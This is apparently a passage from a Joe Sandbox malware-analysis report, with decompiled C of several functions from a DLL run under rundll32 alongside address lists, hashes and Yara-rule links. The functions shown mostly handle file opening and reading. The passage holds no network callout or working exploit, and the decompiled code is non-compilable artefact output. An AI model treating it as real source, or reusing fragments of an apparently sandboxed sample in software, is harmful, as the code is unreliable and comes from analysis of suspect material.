				r15d = r15d + 0xea7;
				r10d = r10d - __r8[0x12];
				r15d = r15d ^ 0x00002598;
				r8d = __r8[4];
				r9d = _t160;
				r8d = r8d &  *(_t209 + 0xb8);
				r12d = 0x3189;
				 *(_t209 + 0x58) = __r8[0x54] & 0x0000228c;
				r9d = r9d | r12d;
				 *(_t209 + 0x50) = _t160 & 0x00003666;
				 *(_t209 + 0x48) = r11d;
				 *(_t209 + 0x40) = __r8;
				 *(_t209 + 0x38) = r10d;
				 *(_t209 + 0x30) = r15d;
				 *((intOrPtr*)(_t209 + 0x28)) = _t223 - 0x343a;
				 *(_t209 + 0x20) = r14d;
				E00007FFC7FFC130E2060(__r8, _t160 | r13d, _t201, _t204, _t206, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t160;
				return  *((intOrPtr*)(_t209 + 0xc0)) + 0xffffee61;
			}




















                                0x7ffc130e2380
                                0x7ffc130e2385
                                0x7ffc130e238a
                                0x7ffc130e238b
                                0x7ffc130e238c
                                0x7ffc130e238d
                                0x7ffc130e238e
                                0x7ffc130e238f
                                0x7ffc130e2390
                                0x7ffc130e2393
                                0x7ffc130e2397
                                0x7ffc130e239b
                                0x7ffc130e23a3
                                0x7ffc130e23bc
                                0x7ffc130e23d4
                                0x7ffc130e23e1
                                0x7ffc130e23eb
                                0x7ffc130e23f2
                                0x7ffc130e2402
                                0x7ffc130e240f
                                0x7ffc130e241c
                                0x7ffc130e2420
                                0x7ffc130e2423
                                0x7ffc130e242e
                                0x7ffc130e2436
                                0x7ffc130e243c
                                0x7ffc130e2441
                                0x7ffc130e2444
                                0x7ffc130e2452
                                0x7ffc130e245e
                                0x7ffc130e2465
                                0x7ffc130e246a
                                0x7ffc130e2471
                                0x7ffc130e248b
                                0x7ffc130e248f
                                0x7ffc130e2495
                                0x7ffc130e249a
                                0x7ffc130e24a1
                                0x7ffc130e24a6
                                0x7ffc130e24ad
                                0x7ffc130e24b8
                                0x7ffc130e24c3
                                0x7ffc130e24c7
                                0x7ffc130e24cf
                                0x7ffc130e24de
                                0x7ffc130e24e4
                                0x7ffc130e24e7
                                0x7ffc130e24f0
                                0x7ffc130e250e
                                0x7ffc130e2534
                                0x7ffc130e253e
                                0x7ffc130e255b
                                0x7ffc130e255d
                                0x7ffc130e256b
                                0x7ffc130e257d
                                0x7ffc130e2583
                                0x7ffc130e258f
                                0x7ffc130e259a
                                0x7ffc130e25a2
                                0x7ffc130e25a4
                                0x7ffc130e25b1
                                0x7ffc130e25bc
                                0x7ffc130e25c3
                                0x7ffc130e25d4
                                0x7ffc130e25ea
                                0x7ffc130e25f4
                                0x7ffc130e261b
                                0x7ffc130e261d
                                0x7ffc130e2634
                                0x7ffc130e263d
                                0x7ffc130e2649
                                0x7ffc130e2650
                                0x7ffc130e2653
                                0x7ffc130e266d
                                0x7ffc130e267a
                                0x7ffc130e267e
                                0x7ffc130e2685
                                0x7ffc130e2689
                                0x7ffc130e2690
                                0x7ffc130e2694
                                0x7ffc130e26b2
                                0x7ffc130e26ba
                                0x7ffc130e26c0
                                0x7ffc130e26c4
                                0x7ffc130e26c7
                                0x7ffc130e26cb
                                0x7ffc130e26d0
                                0x7ffc130e26d5
                                0x7ffc130e26da
                                0x7ffc130e26df
                                0x7ffc130e26e3
                                0x7ffc130e26e8
                                0x7ffc130e26fa
                                0x7ffc130e272d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocProcess
                                • String ID: 2 $6$62 $662 $7$8662
                                • API String ID: 1617791916-3329516171
                                • Opcode ID: d549252b29e21f15087af81f1e2d0605a3b1b60e3360cae5e9e19fc1c2354d83
                                • Instruction ID: 799a62481cb79f975a68f88121b026e27988392592366ed8ebdcb442330c63ba
                                • Opcode Fuzzy Hash: d549252b29e21f15087af81f1e2d0605a3b1b60e3360cae5e9e19fc1c2354d83
                                • Instruction Fuzzy Hash: 5232F2735182C18BE371CF29E44479EBBA4F788748F148129EA899BB59DB7CE954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F243C Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E00007FFC7FFC130F243C(signed int __ebx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int* __rdx, signed int __rdi, void* __rsi, signed int __r8) {
				void* __rbp;
				signed int _t120;
				long _t134;
				void* _t137;
				void* _t139;
				void* _t140;
				signed int _t155;
				signed int _t156;
				signed char _t160;
				signed char _t161;
				void* _t185;
				void* _t186;
				signed int* _t207;
				intOrPtr* _t210;
				long long _t221;
				intOrPtr* _t229;
				signed long long _t237;
				intOrPtr _t251;
				signed long long _t252;
				signed long long _t272;
				signed long long _t273;
				signed int* _t278;
				void* _t281;
				void* _t282;
				signed int* _t284;
				void* _t285;
				void* _t293;
				void* _t295;
				void* _t300;
				void* _t303;

				_t280 = __rsi;
				_t155 = __ebx;
				_t207 = _t284;
				_t207[2] = __rbx;
				_t207[4] = __rdi;
				_t207[6] = __r8;
				_t282 = _t207 - 0x47;
				_t285 = _t284 - 0xc0;
				r12d = r9d;
				r9d =  *(_t282 + 0x77);
				_t278 = __rdx;
				r8d =  *(_t282 + 0x6f);
				_t229 = __rcx;
				E00007FFC7FFC130F20A8(r12d, __eflags, _t207, __rcx, _t282 - 1, _t282);
				asm("movups xmm0, [eax]");
				asm("movups xmm1, xmm0");
				asm("psrldq xmm1, 0x8");
				asm("dec cx");
				 *(_t282 - 0x11) = _t303 >> 0x20;
				asm("movups [ebp-0x59], xmm0");
				asm("movsd xmm0, [eax+0x10]");
				asm("movsd [ebp-0x31], xmm0");
				asm("movsd [ebp-0x49], xmm0");
				if (r15d != 0xffffffff) goto 0x130f24c7;
				E00007FFC7FFC130EE680(_t207);
				 *_t207 =  *_t207 & 0x00000000;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FFC7FFC130EE6A0(_t207);
				goto 0x130f280e;
				_t120 = E00007FFC7FFC130F3C80(r12d, _t185, _t207, _t229, _t282 - 1, __rdx, __rdx, __rsi);
				 *__rdx = _t120;
				if (_t120 != 0xffffffff) goto 0x130f24eb;
				E00007FFC7FFC130EE680(_t207);
				 *_t207 =  *_t207 & 0x00000000;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FFC7FFC130EE6A0(_t207);
				 *_t207 = 0x18;
				goto 0x130f24bb;
				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
				r8d = r15d;
				 *(_t282 - 0x21) =  *(_t282 - 0x21) & 0x00000000;
				 *_t229 = 1;
				_t231 =  *(_t282 - 0x49) >> 0x20;
				_t156 = _t155 |  *(_t282 - 0x49);
				 *(_t285 + 0x28) = _t156;
				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
				 *(_t282 - 0x29) = 0x18;
				 *(_t282 - 0x19) =  !(r12d >> 7) & 0x00000001;
				 *(_t282 - 0x39) =  *(_t282 - 0x49) >> 0x20;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				r14d =  *(_t282 - 0x55);
				 *(_t282 - 0x41) = _t207;
				if (_t207 != 0xffffffff) goto 0x130f25df;
				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f25ac;
				if ((r12b & 0x00000001) == 0) goto 0x130f25ac;
				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
				asm("inc ecx");
				 *(_t282 - 0x55) = r14d;
				r8d = r15d;
				 *(_t285 + 0x28) = _t156;
				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				 *(_t282 - 0x41) = _t207;
				if (_t207 != 0xffffffff) goto 0x130f25df;
				_t237 =  *__rdx;
				_t210 =  *((intOrPtr*)(0x13124970 + (_t237 >> 6) * 8));
				 *(_t210 + (_t237 << 6) + 0x38) =  *(_t210 + (_t237 << 6) + 0x38) & 0x000000fe;
				E00007FFC7FFC130EE630(GetLastError(), _t210,  *(_t282 - 0x49) >> 0x20);
				goto 0x130f24bb;
				if (GetFileType(_t303) != 0) goto 0x130f263d;
				_t134 = GetLastError();
				E00007FFC7FFC130EE630(_t134, _t210,  *(_t282 - 0x49) >> 0x20);
				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) & 0x000000fe;
				CloseHandle(_t300);
				if (_t134 != 0) goto 0x130f24bb;
				_t137 = E00007FFC7FFC130EE6A0(_t210);
				 *_t210 = 0xd;
				goto 0x130f24bb;
				if (_t137 != 2) goto 0x130f264a;
				goto 0x130f2652;
				if (_t137 != 3) goto 0x130f2652;
				_t160 =  *(_t282 - 0x59) | 0x48;
				E00007FFC7FFC130F3B9C(_t160,  *__rdx, _t186,  *(_t282 - 0x49) >> 0x20, _t207, __rdx, _t280, _t282, _t295, _t293);
				_t161 = _t160 | 0x00000001;
				 *(_t282 - 0x59) = _t161;
				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) = _t161;
				 *((char*)( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x39)) = 0;
				if ((r12b & 0x00000002) == 0) goto 0x130f26b4;
				_t139 = E00007FFC7FFC130F22B4(_t161,  *__rdx, r12d & 0x0000003f,  *(_t282 - 0x49) >> 0x20, _t280);
				r13d = _t139;
				if (_t139 != 0) goto 0x130f26e3;
				asm("movups xmm0, [ebp-0x59]");
				asm("movsd xmm1, [ebp-0x31]");
				r8d = r12d;
				asm("movaps [ebp-0x1], xmm0");
				 *((char*)(_t282 - 0x61)) = 0;
				asm("movsd [ebp+0xf], xmm1");
				_t140 = E00007FFC7FFC130F1E14( *_t278,  *(_t282 - 0x49) >> 0x20, _t282 - 1, _t280, _t282 - 0x61);
				if (_t140 == 0) goto 0x130f26f2;
				r13d = _t140;
				E00007FFC7FFC130F5278( *_t278, r12d & 0x0000003f, _t185, _t140,  *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)),  *(_t282 - 0x49) >> 0x20, _t280);
				goto 0x130f280e;
				 *((char*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x39)) =  *((intOrPtr*)(_t282 - 0x61));
				_t272 =  *_t278;
				_t273 = _t272 << 6;
				_t251 =  *((intOrPtr*)(0x13124970 + (_t272 >> 6) * 8));
				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) & 0x000000fe;
				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) | r12d >> 0x00000010 & 0x00000001;
				if ((_t161 & 0x00000048) != 0) goto 0x130f2759;
				if ((r12b & 0x00000008) == 0) goto 0x130f2759;
				_t252 =  *_t278;
				_t221 =  *((intOrPtr*)(0x13124970 + (_t252 >> 6) * 8));
				 *(_t221 + (_t252 << 6) + 0x38) =  *(_t221 + (_t252 << 6) + 0x38) | 0x00000020;
				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f280c;
				if ((r12b & 0x00000001) == 0) goto 0x130f280c;
				CloseHandle(_t281);
				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
				asm("inc ecx");
				r8d =  *(_t282 - 0x11);
				 *(_t285 + 0x28) = 0xc0000000;
				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
				 *(_t282 - 0x55) = r14d;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t221 != 0xffffffff) goto 0x130f27f2;
				E00007FFC7FFC130EE630(GetLastError(), _t221,  *(_t282 - 0x49) >> 0x20);
				 *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) & 0x000000fe;
				E00007FFC7FFC130F3DB0(_t161,  *_t278, _t185, _t231, _t278, _t280);
				goto 0x130f24bb;
				 *((long long*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x28)) = _t221;
				return 0;
			}

































                                0x7ffc130f243c
                                0x7ffc130f243c
                                0x7ffc130f243c
                                0x7ffc130f243f
                                0x7ffc130f2443
                                0x7ffc130f2447
                                0x7ffc130f2454
                                0x7ffc130f2458
                                0x7ffc130f245f
                                0x7ffc130f2465
                                0x7ffc130f2469
                                0x7ffc130f246c
                                0x7ffc130f2470
                                0x7ffc130f247a
                                0x7ffc130f247f
                                0x7ffc130f2482
                                0x7ffc130f2485
                                0x7ffc130f248a
                                0x7ffc130f2493
                                0x7ffc130f2497
                                0x7ffc130f249b
                                0x7ffc130f24a0
                                0x7ffc130f24a5
                                0x7ffc130f24ae
                                0x7ffc130f24b0
                                0x7ffc130f24b5
                                0x7ffc130f24b8
                                0x7ffc130f24bb
                                0x7ffc130f24c2
                                0x7ffc130f24c7
                                0x7ffc130f24cc
                                0x7ffc130f24d1
                                0x7ffc130f24d3
                                0x7ffc130f24d8
                                0x7ffc130f24db
                                0x7ffc130f24de
                                0x7ffc130f24e3
                                0x7ffc130f24e9
                                0x7ffc130f24eb
                                0x7ffc130f24ff
                                0x7ffc130f2502
                                0x7ffc130f2507
                                0x7ffc130f2514
                                0x7ffc130f251a
                                0x7ffc130f2520
                                0x7ffc130f2524
                                0x7ffc130f252f
                                0x7ffc130f2536
                                0x7ffc130f2539
                                0x7ffc130f253d
                                0x7ffc130f2543
                                0x7ffc130f254c
                                0x7ffc130f2557
                                0x7ffc130f2564
                                0x7ffc130f256a
                                0x7ffc130f256c
                                0x7ffc130f2579
                                0x7ffc130f257e
                                0x7ffc130f2582
                                0x7ffc130f2589
                                0x7ffc130f258d
                                0x7ffc130f2599
                                0x7ffc130f259f
                                0x7ffc130f25aa
                                0x7ffc130f25ac
                                0x7ffc130f25c4
                                0x7ffc130f25c8
                                0x7ffc130f25d5
                                0x7ffc130f25da
                                0x7ffc130f25ea
                                0x7ffc130f25ec
                                0x7ffc130f25f6
                                0x7ffc130f2617
                                0x7ffc130f261f
                                0x7ffc130f2627
                                0x7ffc130f262d
                                0x7ffc130f2632
                                0x7ffc130f2638
                                0x7ffc130f2643
                                0x7ffc130f2648
                                0x7ffc130f264d
                                0x7ffc130f264f
                                0x7ffc130f2657
                                0x7ffc130f2669
                                0x7ffc130f2677
                                0x7ffc130f267e
                                0x7ffc130f2697
                                0x7ffc130f26a0
                                0x7ffc130f26a4
                                0x7ffc130f26a9
                                0x7ffc130f26ae
                                0x7ffc130f26b4
                                0x7ffc130f26be
                                0x7ffc130f26c7
                                0x7ffc130f26ca
                                0x7ffc130f26ce
                                0x7ffc130f26d2
                                0x7ffc130f26d7
                                0x7ffc130f26de
                                0x7ffc130f26e0
                                0x7ffc130f26e5
                                0x7ffc130f26ed
                                0x7ffc130f270a
                                0x7ffc130f270e
                                0x7ffc130f271b
                                0x7ffc130f271f
                                0x7ffc130f272b
                                0x7ffc130f2730
                                0x7ffc130f2737
                                0x7ffc130f273d
                                0x7ffc130f273f
                                0x7ffc130f2750
                                0x7ffc130f2754
                                0x7ffc130f2765
                                0x7ffc130f276f
                                0x7ffc130f2778
                                0x7ffc130f2786
                                0x7ffc130f278c
                                0x7ffc130f2791
                                0x7ffc130f2795
                                0x7ffc130f279c
                                0x7ffc130f27a4
                                0x7ffc130f27b0
                                0x7ffc130f27bd
                                0x7ffc130f27c7
                                0x7ffc130f27e1
                                0x7ffc130f27e8
                                0x7ffc130f27ed
                                0x7ffc130f2807
                                0x7ffc130f282a

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                • String ID:
                                • API String ID: 1330151763-0
                                • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction ID: 25588ca94b627607ef5f1f763dcafdefba288fa573b939a7fcf0709a7b59f7d7
                                • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction Fuzzy Hash: 31C1CD36B28E598AEB54CF64D9513AC37A5FB48BA8F014235CA2E677D5CF38E425C310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F5864 Relevance: 10.8, APIs: 7, Instructions: 294COMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E00007FFC7FFC130F5864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
				void* _t118;
				unsigned int _t135;
				void* _t139;
				void* _t142;
				char _t154;
				char _t155;
				char _t156;
				void* _t181;
				long long _t186;
				long long _t220;
				intOrPtr _t221;
				signed short* _t235;
				signed int* _t238;
				char* _t241;
				signed short* _t250;
				signed long long _t255;
				signed long long _t256;
				signed long long _t261;
				DWORD* _t263;
				signed short* _t264;
				void* _t270;
				void* _t272;
				signed long long _t274;
				void* _t276;
				void* _t277;
				long long _t279;
				signed short* _t281;
				signed short* _t288;
				long _t292;
				void* _t294;
				void* _t297;
				void* _t299;
				char* _t301;
				char* _t302;
				char* _t303;

				_t279 = __r8;
				 *((long long*)(_t276 + 0x18)) = __rbx;
				 *((long long*)(_t276 + 0x10)) = __rdx;
				_t277 = _t276 - 0x60;
				r12d = r8d;
				if (r13d != 0xfffffffe) goto 0x130f58a5;
				E00007FFC7FFC130EE680(__rax);
				 *__rax = 0;
				E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 9;
				goto 0x130f5cae;
				if (__ecx < 0) goto 0x130f5c97;
				_t181 = r13d -  *0x13124d70; // 0x40
				if (_t181 >= 0) goto 0x130f5c97;
				_t3 = _t270 + 1; // 0x1
				r8d = _t3;
				 *((long long*)(_t277 + 0x48)) = __r8;
				_t274 = __ecx << 6;
				_t255 = __ecx >> 6;
				 *(_t277 + 0x40) = _t255;
				_t220 =  *((intOrPtr*)(0x13124970 + _t255 * 8));
				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x130f5c97;
				if (r12d - 0x7fffffff <= 0) goto 0x130f5911;
				E00007FFC7FFC130EE680(_t220);
				 *_t220 = 0;
				E00007FFC7FFC130EE6A0(_t220);
				 *_t220 = 0x16;
				goto 0x130f5ca9;
				if (r12d == 0) goto 0x130f5c93;
				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x130f5c93;
				_t186 = __rdx;
				if (_t186 == 0) goto 0x130f58fa;
				r10d =  *((char*)(_t220 + _t274 + 0x39));
				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
				if (_t186 == 0) goto 0x130f596c;
				if (_t186 != 0) goto 0x130f5961;
				if ((r8b &  !r12d) == 0) goto 0x130f5976;
				r14d = r12d;
				goto 0x130f5a0c;
				if ((r8b &  !r12d) != 0) goto 0x130f5992;
				E00007FFC7FFC130EE680(_t220);
				 *_t220 = 0;
				_t118 = E00007FFC7FFC130EE6A0(_t220);
				 *_t220 = 0x16;
				E00007FFC7FFC130EE580(_t118);
				goto 0x130f5b18;
				r14d = r12d;
				r14d = r14d >> 1;
				r14d =  <  ? 4 : r14d;
				E00007FFC7FFC130EE154(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				_t241 = _t220;
				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				E00007FFC7FFC130EE114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				_t301 = _t241;
				if (_t241 != 0) goto 0x130f59db;
				E00007FFC7FFC130EE6A0(_t220);
				 *_t220 = 0xc;
				E00007FFC7FFC130EE680(_t220);
				 *_t220 = 8;
				goto 0x130f5b18;
				_t26 = _t255 + 1; // 0x1
				r8d = _t26;
				E00007FFC7FFC130F5D68(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)), _t255);
				_t256 =  *(_t277 + 0x40);
				r10b =  *((intOrPtr*)(_t277 + 0xa0));
				r8d = 1;
				 *((long long*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x30)) = _t220;
				_t221 =  *((intOrPtr*)(0x13124970 + _t256 * 8));
				 *((long long*)(_t277 + 0x50)) = _t301;
				r9d = 0xa;
				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x130f5aa1;
				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
				if (_t154 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t301 = _t154;
				r14d = r14d - 1;
				_t302 = _t301 + _t279;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
				if (r10b == 0) goto 0x130f5aa1;
				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b));
				if (_t155 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t302 = _t155;
				_t303 = _t302 + _t279;
				r14d = r14d - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
				if (r10b != r8b) goto 0x130f5aa1;
				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c));
				if (_t156 == r9b) goto 0x130f5aa1;
				if (r14d == 0) goto 0x130f5aa1;
				 *_t303 = _t156;
				r14d = r14d - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
				if (E00007FFC7FFC130F3EE4(r13d, 0,  *((intOrPtr*)(0x13124970 + _t256 * 8))) == 0) goto 0x130f5b36;
				_t228 =  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8));
				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b36;
				if (GetConsoleMode(_t299) == 0) goto 0x130f5b36;
				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x130f5b3b;
				r14d = r14d >> 1;
				r8d = r14d;
				 *(_t277 + 0x20) = _t270;
				if (ReadConsoleW(_t297, _t294, _t292, _t263, _t270) != 0) goto 0x130f5b2a;
				E00007FFC7FFC130EE630(GetLastError(),  *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
				E00007FFC7FFC130EE114( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)), _t241);
				goto 0x130f5cb1;
				goto 0x130f5b76;
				 *((intOrPtr*)(_t277 + 0x48)) = sil;
				r8d = r14d;
				 *(_t277 + 0x20) = _t270;
				if (ReadFile(_t272, ??, ??, ??) == 0) goto 0x130f5c5d;
				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x130f5c5d;
				if (( *( *((intOrPtr*)(0x13124970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x130f5b1b;
				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x130f5bbf;
				_t261 = _t303 + _t279;
				 *(_t277 + 0x20) = _t292 >> 1;
				_t135 = E00007FFC7FFC130F5564(__ebx, r13d, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
				goto 0x130f5b1b;
				if (_t135 == 0) goto 0x130f5c45;
				_t281 =  *((intOrPtr*)(_t277 + 0x50));
				_t250 = _t281;
				_t264 = _t281;
				_t288 =  &(_t281[_t135 >> 1]);
				if (_t281 - _t288 >= 0) goto 0x130f5c38;
				_t235 =  &(_t281[1]);
				r9d =  *_t250 & 0x0000ffff;
				if (r9w == 0x1a) goto 0x130f5c2f;
				if (r9w != 0xd) goto 0x130f5c18;
				if (_t235 - _t288 >= 0) goto 0x130f5c18;
				if ( *_t235 != 0xa) goto 0x130f5c18;
				 *_t264 = 0xa;
				goto 0x130f5c28;
				_t264[1] = r9w;
				if ( &(_t250[3]) - _t288 < 0) goto 0x130f5beb;
				goto 0x130f5c38;
				_t238 =  *((intOrPtr*)(0x13124970 + _t261 * 8));
				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
				goto 0x130f5b1b;
				E00007FFC7FFC130F5334(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
				goto 0x130f5bb8;
				if (GetLastError() != 5) goto 0x130f5c83;
				E00007FFC7FFC130EE6A0(_t238);
				 *_t238 = 9;
				_t139 = E00007FFC7FFC130EE680(_t238);
				 *_t238 = 5;
				goto 0x130f5b18;
				if (_t139 != 0x6d) goto 0x130f5b11;
				goto 0x130f5b1b;
				goto 0x130f5cb1;
				E00007FFC7FFC130EE680(_t238);
				 *_t238 = 0xa;
				_t142 = E00007FFC7FFC130EE6A0(_t238);
				 *_t238 = 9;
				return E00007FFC7FFC130EE580(_t142) | 0xffffffff;
			}






































                                0x7ffc130f5864
                                0x7ffc130f5864
                                0x7ffc130f5869
                                0x7ffc130f5879
                                0x7ffc130f5883
                                0x7ffc130f588a
                                0x7ffc130f588c
                                0x7ffc130f5893
                                0x7ffc130f5895
                                0x7ffc130f589a
                                0x7ffc130f58a0
                                0x7ffc130f58a9
                                0x7ffc130f58af
                                0x7ffc130f58b6
                                0x7ffc130f58bf
                                0x7ffc130f58bf
                                0x7ffc130f58c6
                                0x7ffc130f58ce
                                0x7ffc130f58d2
                                0x7ffc130f58dd
                                0x7ffc130f58e2
                                0x7ffc130f58eb
                                0x7ffc130f58f8
                                0x7ffc130f58fa
                                0x7ffc130f58ff
                                0x7ffc130f5901
                                0x7ffc130f5906
                                0x7ffc130f590c
                                0x7ffc130f5914
                                0x7ffc130f591f
                                0x7ffc130f5925
                                0x7ffc130f5928
                                0x7ffc130f5932
                                0x7ffc130f593d
                                0x7ffc130f5945
                                0x7ffc130f5950
                                0x7ffc130f5955
                                0x7ffc130f595f
                                0x7ffc130f5961
                                0x7ffc130f5967
                                0x7ffc130f5974
                                0x7ffc130f5976
                                0x7ffc130f597b
                                0x7ffc130f597d
                                0x7ffc130f5982
                                0x7ffc130f5988
                                0x7ffc130f598d
                                0x7ffc130f5992
                                0x7ffc130f5995
                                0x7ffc130f599b
                                0x7ffc130f59a2
                                0x7ffc130f59a9
                                0x7ffc130f59ac
                                0x7ffc130f59b3
                                0x7ffc130f59b8
                                0x7ffc130f59be
                                0x7ffc130f59c0
                                0x7ffc130f59c5
                                0x7ffc130f59cb
                                0x7ffc130f59d0
                                0x7ffc130f59d6
                                0x7ffc130f59e0
                                0x7ffc130f59e0
                                0x7ffc130f59e4
                                0x7ffc130f59e9
                                0x7ffc130f59f5
                                0x7ffc130f59fd
                                0x7ffc130f5a07
                                0x7ffc130f5a0c
                                0x7ffc130f5a12
                                0x7ffc130f5a17
                                0x7ffc130f5a22
                                0x7ffc130f5a24
                                0x7ffc130f5a2b
                                0x7ffc130f5a30
                                0x7ffc130f5a32
                                0x7ffc130f5a35
                                0x7ffc130f5a3c
                                0x7ffc130f5a42
                                0x7ffc130f5a4a
                                0x7ffc130f5a50
                                0x7ffc130f5a57
                                0x7ffc130f5a5c
                                0x7ffc130f5a5e
                                0x7ffc130f5a69
                                0x7ffc130f5a6c
                                0x7ffc130f5a6f
                                0x7ffc130f5a77
                                0x7ffc130f5a7d
                                0x7ffc130f5a84
                                0x7ffc130f5a89
                                0x7ffc130f5a8b
                                0x7ffc130f5a99
                                0x7ffc130f5a9c
                                0x7ffc130f5aab
                                0x7ffc130f5abd
